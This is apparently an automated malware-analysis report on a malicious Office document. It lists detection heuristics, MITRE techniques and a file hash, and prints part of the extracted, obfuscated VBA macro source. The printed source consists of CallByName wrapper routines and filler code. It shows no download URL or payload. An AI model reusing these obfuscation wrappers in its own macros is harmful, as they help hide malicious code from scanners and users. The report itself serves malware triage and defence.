Verdict: MALICIOUS
Risk Score: 144

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The heuristics indicate the use of `CallByName` and auto-execution via `Document_Open`, suggesting the macros are intended to run automatically upon opening the document. The primary function of the VBA code appears to be executing arbitrary code, likely to download and execute a second-stage payload, which is a common technique for malware delivery.
Heuristics (6)

- Reference to Windows Script Host (high, SC_STR_WSCRIPT): reference to Windows Script Host.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- CallByName call (high, OLE_VBA_CALLBYNAME): `CallByName` call. Matched lines in script:

      Dim rREkCLEslL As Integer, kTRGfWEy As Integer
      bLAdy = CallByName(lUYWi, eSriMosOMv, 2)
      End Function

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1798 bytes |

SHA-256: 007a961b52665b2e92afa3a072389d065fa465248f1773353f4f51fff467383e

Detection

ClamAV: No threats found

Obfuscation or payload: likely. 30 of 51 identifiers look randomly generated (e.g. 'omMzZqb7jBGRIm8rYY64nD'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script). The source was extracted as a single run of text; line breaks and indentation below are restored by hand from VBA statement boundaries, and the analyst comments are not part of the sample.

```vb
Attribute VB_Name = "SLuAKL"

' Analyst note: every public routine below is a thin wrapper around CallByName,
' which lets the macro invoke members of a COM object by a name supplied at
' run time (CallType 1 = VbMethod, 2 = VbGet, 4 = VbLet). The private routines
' are filler that call undefined names and never affect control flow.

Public Function bLAdy(ByVal lUYWi As Object, ByVal zTHYXlxIIc As String, ByVal eSriMosOMv As String, ByVal GoeYPp As Integer) As Variant
    Dim rREkCLEslL As Integer, kTRGfWEy As Integer
    bLAdy = CallByName(lUYWi, eSriMosOMv, 2)       ' property get by name
End Function

Public Sub KmPiI(ByVal koqwxGJSWQ As String, ByVal UJuGPYCIKi As Variant, ByVal SMYXA As Variant, ByVal jksxaskKaJ As Object)
    Dim qvgRk As String
    CallByName jksxaskKaJ, koqwxGJSWQ, 1, SMYXA, UJuGPYCIKi   ' method call with two arguments
End Sub

Private Function VAqvWwwLxt() As Boolean
    HTXti "7zKOizXIOKAhVH8xgvR"
    VAqvWwwLxt = False
End Function

Public Function potTOQj(ByVal jwvIKIdPs As String, ByVal uauCLzYxFy As String, ByVal FpBCmZuUb As Object) As Variant
    Dim DGcUz As Boolean
    Dim PKzVZ As Boolean
    Set potTOQj = CallByName(FpBCmZuUb, uauCLzYxFy, 2, jwvIKIdPs)   ' property get with one argument, returns an object
End Function

Public Sub gfDVb(ByVal UNBmlkKNLR As Boolean, ByVal WfGlH As String, ByVal LypEislIBy As Object, ByVal aHKBLYxD As Variant)
    Dim vMxvWF As Integer
    Dim tkQllzvu As Integer
    CallByName LypEislIBy, WfGlH, 1, aHKBLYxD   ' method call with one argument
End Sub

Private Sub vEVzXyMgw(ByVal TBHnt As Boolean)
    ' Analyst note: split into two statements on reconstruction; the flattened
    ' source read "NvOKlpusE aVtapbVnl ...", which is not valid as one call.
    NvOKlpusE
    aVtapbVnl "cUEKLYNV7x2u4UynNk", 1093, 9096
End Sub

Private Function rmSqsdMswX() As Integer
    nCnktKv False
    hCCQENhD 3748, 2598, "omMzZqb7jBGRIm8rYY64nD"
    CGgZkEaFBc
    rmSqsdMswX = 1258
End Function

Public Sub ulAUPana(ByVal CcKZRdW As Integer, ByVal ruwXYoeAf As String, ByVal pcdOb As Variant, ByVal vnMneN As String, ByVal BajQck As Object)
    CallByName BajQck, ruwXYoeAf, 4, pcdOb   ' property let by name
End Sub

Private Function gnUywC(ByVal RjGyl As String) As Boolean
    gOZso 1884
    gnUywC = True
End Function

Public Sub ZkQWC(ByVal DHCii As Object, ByVal nsfPXkp As String)
    Dim GyXmbTidT As Integer
    Dim rPPrnI As Integer
    kayWGvM = "TvnR0hDuvbs0I7B48b5"
    CallByName DHCii, nsfPXkp, 1   ' method call with no arguments
End Sub
```